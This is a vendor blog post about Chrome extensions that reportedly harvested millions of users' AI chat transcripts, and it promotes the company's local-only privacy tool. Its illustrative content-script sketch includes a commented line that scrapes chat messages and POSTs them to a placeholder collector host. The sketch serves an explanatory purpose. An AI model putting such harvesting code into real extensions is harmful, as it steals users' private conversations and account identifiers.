7 min read · MyYaad Team

Chrome Extensions Harvested 8M Users' AI Chats — What This Means for You

Chrome extension · AI privacy · data breach · browser security

In late 2025, researchers uncovered one of the more quietly damaging privacy scandals in recent browser history. A cluster of Chrome extensions — several of them explicitly marketed as privacy and productivity tools — had been silently transmitting users' AI conversation data to remote servers. The affected extensions had accumulated over eight million installs between them.

The coverage that followed on The Register and Hacker News was sharp, but the deeper problem was underreported: this was not an isolated incident of malware. These extensions operated exactly as their developers intended. The data collection was a feature, not a bug.

---

What Happened: The December 2025 Extension Scandal

The extensions in question were designed to integrate with AI platforms — tools that positioned themselves as assistants for organising, summarising, or enhancing conversations with ChatGPT, Claude, and similar services. Several carried four- and five-star reviews. Their permissions looked standard: access to tab content, access to specific websites.

What users did not know was that every conversation passing through those pages was being intercepted at the content script level and relayed to collection servers operated by the extension developers. In at least two cases, the privacy policies technically disclosed this — buried under language about "service improvement" and "anonymised analytics."

Researchers identified the pattern by analysing network traffic while using the extensions. The data being sent was not anonymised in any meaningful sense. It included full conversation transcripts, timestamps, and in some cases the usernames or account identifiers that the AI platforms embedded in their page structure.

Google removed the extensions after disclosure, but not before they had been active for months. The collected data — its current location and how it has been used — remains unknown.

---

Why Privacy Extensions Are a Trust Problem

The scandal exposed a structural problem that no amount of better enforcement will fully solve: browser extensions require an extraordinary level of trust, and users have no reliable way to verify that trust is warranted.

A Chrome extension with permission to read page content on chat.openai.com can read everything on that page. The entire conversation. Every message you have ever sent. Every response you received. The extension can send that content anywhere it chooses, and your browser will not warn you — because you already granted the permission when you installed the tool.

This is not a flaw in how these particular extensions were built. It is the architecture of browser extensions. Content scripts run inside the page context. They see what you see. The difference between a legitimate integration and a data harvester is the developer's intent — and intent is not inspectable.
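To make the point concrete, here is a hypothetical sketch of how little code a harvesting content script needs. The payload builder below is pure JavaScript; the DOM selector (`.message`) and the collection endpoint (`collector.example.com`) are invented for illustration and do not correspond to any real extension.

```javascript
// Hypothetical harvester sketch. A content script already has read access
// to everything rendered on the page; "harvesting" is just serialising it.

function buildPayload(messages, userId) {
  // Bundle everything the page exposes: full transcript, an account
  // identifier scraped from the page structure, and a timestamp.
  return JSON.stringify({
    user: userId,
    capturedAt: new Date().toISOString(),
    transcript: messages,
  });
}

// In a real content script, the two lines doing the damage would look
// something like this (selector and endpoint are invented):
//
//   const messages = [...document.querySelectorAll(".message")].map(m => m.textContent);
//   fetch("https://collector.example.com/ingest", { method: "POST", body: buildPayload(messages, userId) });
```

Nothing here requires elevated privileges or exploits — it runs entirely within the permission the user already granted at install time.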

There is a further wrinkle. Extensions can update silently. An extension that behaves honestly at install time can add data collection in a subsequent update. Chrome's permission model will alert you to new permissions, but updated behaviour within existing permissions goes unnoticed. The December 2025 extensions almost certainly did not launch with aggressive harvesting. That came later, as their user bases grew large enough to make the data commercially interesting.

The advice to "read the privacy policy" or "only install extensions with source code available" is not wrong, but it is not practical at scale. Most users cannot audit JavaScript, and privacy policies are written by lawyers for legal compliance, not for user comprehension.

---

The Architecture That Prevents This

The core problem with cloud-connected privacy tools — whether extensions, apps, or services — is that they create a remote server that holds your data, controlled by someone other than you. Once your data touches a remote server, you are dependent on that party's security practices, business model, legal exposure, and continued good intentions. History suggests that dependence is risky.

Local-only architecture eliminates this risk class entirely.

MyYaad is built on a different model. Your vault — the store of personal context you want to use with AI tools — lives on your device only. The browser extension does not transmit your data to MyYaad servers, because there are no MyYaad servers involved in the data path. The extension communicates with a local daemon running at 127.0.0.1. Your data never leaves your machine.

When you use an AI platform, the extension intercepts outgoing prompts and substitutes shadow values in place of real personal data before the request reaches the AI provider's servers. The AI receives obfuscated identifiers — not your actual name, medical history, or financial details. When the response comes back, the extension reverses the substitution locally so you see natural, coherent output.
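The substitution round trip can be sketched as two local string transforms over a vault of real-value-to-shadow-value mappings. This is an illustrative sketch only — the token format and function names below are invented, and MyYaad's actual scheme may differ:

```javascript
// Illustrative shadow-value substitution. The vault maps real personal
// data to opaque placeholders; both directions run locally.

const vault = new Map([
  ["Jane Doe", "PERSON_A1"],
  ["asthma", "CONDITION_B2"],
]);

// Replace real values with shadow tokens before the prompt leaves the machine.
function substitute(prompt, vault) {
  let out = prompt;
  for (const [real, shadow] of vault) out = out.split(real).join(shadow);
  return out;
}

// Reverse the mapping locally when the AI's response comes back.
function restore(response, vault) {
  let out = response;
  for (const [real, shadow] of vault) out = out.split(shadow).join(real);
  return out;
}

const sent = substitute("Jane Doe has asthma. Suggest exercises.", vault);
// The provider sees: "PERSON_A1 has CONDITION_B2. Suggest exercises."
const shown = restore("PERSON_A1 should avoid triggers for CONDITION_B2.", vault);
// Restored locally: "Jane Doe should avoid triggers for asthma."
```

The design point is that the vault never travels: the AI provider only ever receives the substituted text, and the mapping needed to reverse it exists solely on the user's device.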

There is no central server to breach. There is no company holding a database of eight million users' AI conversations. If MyYaad's servers were compromised tomorrow, the attacker would find nothing — because the personal data was never there.

This is not a policy or a promise. It is a consequence of how the software is built.

---

How to Evaluate an AI Privacy Tool

The December 2025 scandal should change how people evaluate browser extensions that handle sensitive data. The key questions are architectural, not reputational.

Where does the data go? Any tool that sends your AI conversation content to a remote server is a potential liability, regardless of how the privacy policy frames it. Ask explicitly: does this tool phone home with my conversation data? Is there a network request to the developer's servers while I am chatting with an AI?

What permissions does it request? Read access to page content on AI platforms is necessary for any integration tool. But that permission is also the one that enabled the December 2025 harvesting. Granting it is a decision to trust the developer permanently, including through future updates.
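For reference, the permission in question looks innocuous in a Manifest V3 file. The fragment below is a hypothetical example — the extension name is invented — but the `matches` patterns are the standard mechanism that grants a content script read access to those pages:

```json
{
  "manifest_version": 3,
  "name": "Hypothetical AI Helper",
  "content_scripts": [
    {
      "matches": ["https://chat.openai.com/*", "https://claude.ai/*"],
      "js": ["content.js"]
    }
  ]
}
```

Once installed, `content.js` runs on every matching page with full access to the rendered DOM — including every message in the conversation.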

Is the data path inspectable? Open source extensions allow independent review. Closed source extensions require you to take the developer's word. That is not a dealbreaker, but it is a risk factor worth weighing.

What happens if the company is acquired, shuts down, or is breached? For cloud-connected tools, the answer is often: your historical data is now someone else's problem. For local-only tools, the answer is: nothing, because the data was always on your device.

Does the architecture make the privacy claim structurally true? "We take privacy seriously" is a statement anyone can make. "Your data never leaves your device because there is no mechanism for it to do so" is a verifiable architectural claim. Prefer the latter.

---

The extensions caught in December 2025 were not anomalies. They were the predictable outcome of giving third-party software privileged access to sensitive data streams, with no structural constraint on what it can do with that access.

The answer is not to stop using browser extensions. It is to understand what you are trusting when you install one, and to prefer tools where good privacy behaviour is enforced by design rather than promised by policy.

If you want to bring personal context to your AI conversations without putting that context at risk, download MyYaad and see how the local-first approach works in practice. You can also compare the architectural approaches side by side to understand the difference.

Your AI conversations contain more sensitive information than most people realise. The infrastructure handling that data deserves more scrutiny than a star rating and an install count.